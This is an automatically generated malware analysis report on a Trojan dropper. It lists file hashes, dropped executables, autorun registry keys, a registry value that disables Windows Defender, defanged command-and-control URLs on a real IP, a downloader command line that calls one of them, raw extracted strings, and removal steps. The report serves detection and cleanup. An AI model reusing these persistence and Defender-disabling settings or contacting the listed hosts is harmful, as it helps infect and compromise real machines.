Dropped.Application.Generic.1683936_acf71053f8
Susp_Dropper (Kaspersky), Dropped:Application.Generic.1683936 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: acf71053f845d276d7acfc233fd3cb6f
SHA1: a871b602f3dde9e3e7d81f8bc97680e2cb6023b4
SHA256: 6bb95f9b27f744a61e84ccfddd0a1658be0703a1e524730a0a23ce95ffc47b4f
SSDeep: 3072:GgXdZt9P6D3XJXCBXCCZJMItOdoewR3kHhhDfrsHXTXQhr:Ge340B5ZJMCOdVwsxfrsHXTAhr
Size: 144931 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Mail.Ru
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Dropped creates the following process(es):
setupok.exe:2896
%original file name%.exe:3752
ddnow.exe:2308
ddnow.exe:2100
ddnow.exe:1636
ddnow.exe:2212
ddnow.exe:4048
ddnow.exe:2748
ddnow.exe:804
ddnow.exe:2264
ddnow.exe:2360
tinstall.exe:4036
The Dropped injects its code into the following process(es):
applica.exe:1392
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setupok.exe:2896 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2FD6.tmp (0 bytes)
The process %original file name%.exe:3752 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz5D5B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\icka16591708.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\16591708.txt (0 bytes)
The process ddnow.exe:2308 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
The process ddnow.exe:2100 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:1636 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
The process ddnow.exe:2212 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2748 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:804 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2264 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2360 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process tinstall.exe:4036 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
The Dropped deletes the following file(s):
C:\Windows\System32\Tasks\Adobe Flash Player Updater (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA (0 bytes)
Registry activity
The process setupok.exe:2896 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\idot]
"idot" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"
To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
The process %original file name%.exe:3752 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
The process ddnow.exe:2308 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
The process ddnow.exe:4048 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
The process tinstall.exe:4036 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
Dropped PE files
| MD5 | File path |
|---|---|
| b528db49e0768a9591d6ef902b67416a | c:\Program Files\applica\applica.exe |
| fe1e3670cdc51a0ad694683c98a8c22c | c:\Program Files\applica\uninstall.exe |
| d38543fc9ae37d188a23e06ee11d3504 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll |
| c5dbd61013cf8146a00f826baee93072 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe |
| a3d027a0f8a46f9adb96ab598d02e494 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe |
| 662c45356fcc64b55f8938e284d0c0d0 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe |
| 113d1d7b8a9039e6e63034284e35cc99 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe |
| 008afd62201f96d10b0b748e2779274d | c:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe |
| 4a8acafc1fca3c19dcf38c7b95129036 | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe |
| a5123d7682bfa3f0cbd9fa86ccc7f47a | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 94208 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 286720 | 2536 | 2560 | 3.13045 | 8c712c343be341f0c008fe547f2adcd2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 360
2ad305eb2625cacef55c0e012e3162da
f17d83f93c68a4057a7d562626fab745
2171ff59892413c65994b6335007fb76
59c258e3888d0b4c02040dd649f60018
1f3d33e118bbeef358807c43a9ff02bf
6fae0efc37d2fbae20229d8ad9fea2d6
a9a691d86babf412bff5063a916d813c
db34845a89a44e13403497c06916949e
834f9a1ad76269c7a2f255b664a93f7a
4f810ac44ebcf38b781f6ffec908b30e
30dd59ea6b89831b1efb9ddd8cdf7c4b
2d60312dfc2613c1aa639be1068d9a5f
543be1971fe641023ca9b4e9a441f88c
affd91f1318160d33910095c59662ca6
15b151a60ee59281793c4592e8089e42
1afd38ad853ffd5744e9f8b809183717
03e67c5fd3d17208331cb10da2b41514
421ccf1fd130b0efa5a22a3c5e9e1745
0050d5a52818ce0f6a2ddafc727f4bf7
850ce9dc2931538f978c921b749d8d86
ded140d9ab8c0312c15813af59f60e54
1b0c8d430a3f14b68c9769400a4d9750
f0bd73a4df4b9bc951a6ec697e8cb185
0bcb89e2de30006d7d458e8c2e3e693d
650bd6f7182838930fab35a994703725
URLs
| URL | IP |
|---|---|
| hxxp://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes |  |
| hxxp://162.222.193.23/soid1.php?p=&aaaip=564810 | |
| hxxp://www.rosalesscholarly.pw/act/ehka.php?w=Windows7Ultimate&a=True&b=;7-Zip;ActiveState;Adobe;ATI Technologies;CBSTEST;Classes;Clients;Ghisler;Google;Intel;JavaSoft;JreMetrics;Macromedia;Microsoft;Mozilla;mozilla.org;MozillaPlugins;ODBC;Perl;Policies;RegisteredApplications;Sonic;ThinPrint;VMware, Inc.;WinPcap;WOW6432Node;Microsoft | |
| hxxp://162.222.193.23/run1.php?a=flash&b=111 | |
| hxxp://162.222.193.23/setup200.exe | |
| hxxp://162.222.193.23/run1.php?a=flash&b=rand | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 - ready | |
| hxxp://162.222.193.23/newc4nT.php | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
The Dropped connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
Gw2.Hw
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.193.23/newc4nT.php" "OK" "C:\Users\"%CurrentUserName%"\AppData\Local\icka16591708.txt"
s\"%CurrentUserName%"\AppData\Local\run1.txt"
276d7acfc233fd3cb6f.exe;0" "16591708.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\icka16591708.txt
SimpleFC.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32ers\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll
> ?'?6?=?[?
8 8$8(8,808
7%7/767~7
5!5%5)5-51555
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
? ?'?6?=?_?
>6<%<-<7
hWEB
..bYc
icka16591708.txt
5.ocx
ICKA16~1.TXT
rs\"%CurrentUserName%"\AppData\Local\setupok.exe
cf71053f845d276d7acfc233fd3cb6f.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsz5D5B.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp
Windows
setupok.exe - 61844 - 1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>-Operation f
Eigenschaft %s existiert nicht.
OLE-Fehler %.8xBDie Methode '%s' wird vom Automatisierungsobjekt nicht unterst
ge ($0%x)3Komponente mit der Bezeichnung %s existiert bereits/In der Stringliste sind Duplikate nicht erlaubt#Datei %s kann nicht erstellt werden#Datei %s kann nicht ge
ffnet werden(''%s'' ist kein gpft (%d)#Zu viele Eintr
ge in der Liste (%d)*Listenindex
berschreitet das Maximum (%d)BExpandieren des Speicher-Stream wegen Speichermangel nicht m
glich Fehler beim Lesen von %s%s%s: %s
%s.Seek nicht implementiert
r '%s' nicht gefunden&%s kann nicht zu %s zugewiesen werden
Klasse %s nicht gefunden
%s (%s, Zeile %d)
Abstrakter FehlerBZugriffsverletzung bei Adresse %p in Modul '%s'. %s von Adresse %p
Systemfehler. Code: %d.
%s:Ein Aufruf einer Betriebssystemfunktion ist fehlgeschlagen
ltige Variant-Operation#Ung
ltige Variant-Operation ($%.8x)
Variant ist kein ArrayBVariante des Typs (%s) konnte nicht in Typ (%s) konvertiert werdenF
berlauf bei der Konvertierung einer Variante vom Typ (%s) in Typ (%s)
ltiger Variant-Typ Operation wird nicht unterst
Externe Exception %x$Auswertung von assert fehlgeschlagen
ltige Zeigeroperation
ltige Typumwandlung4Zugriffsverletzung bei Adresse %p. %s von Adresse %p
Privilegierte Anweisung(Exception %s in Modul %s bei %p.
Anwendungsfehler7Format '%s' ung
r Format '%s'(Variant-Methodenaufruf nicht unterst
"'%s' ist kein g
ltiger Integerwert"'%s' ist kein g
E/A-Fehler %d
ltige Gleitkommaoperation
lash\Flash32_23_0_0_185.ocx
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setupok.exe:2896
%original file name%.exe:3752
ddnow.exe:2308
ddnow.exe:2100
ddnow.exe:1636
ddnow.exe:2212
ddnow.exe:4048
ddnow.exe:2748
ddnow.exe:804
ddnow.exe:2264
ddnow.exe:2360
tinstall.exe:4036 - Delete the original Dropped file.
- Delete or disinfect the following files created/modified by the Dropped:
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsu5DD9.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
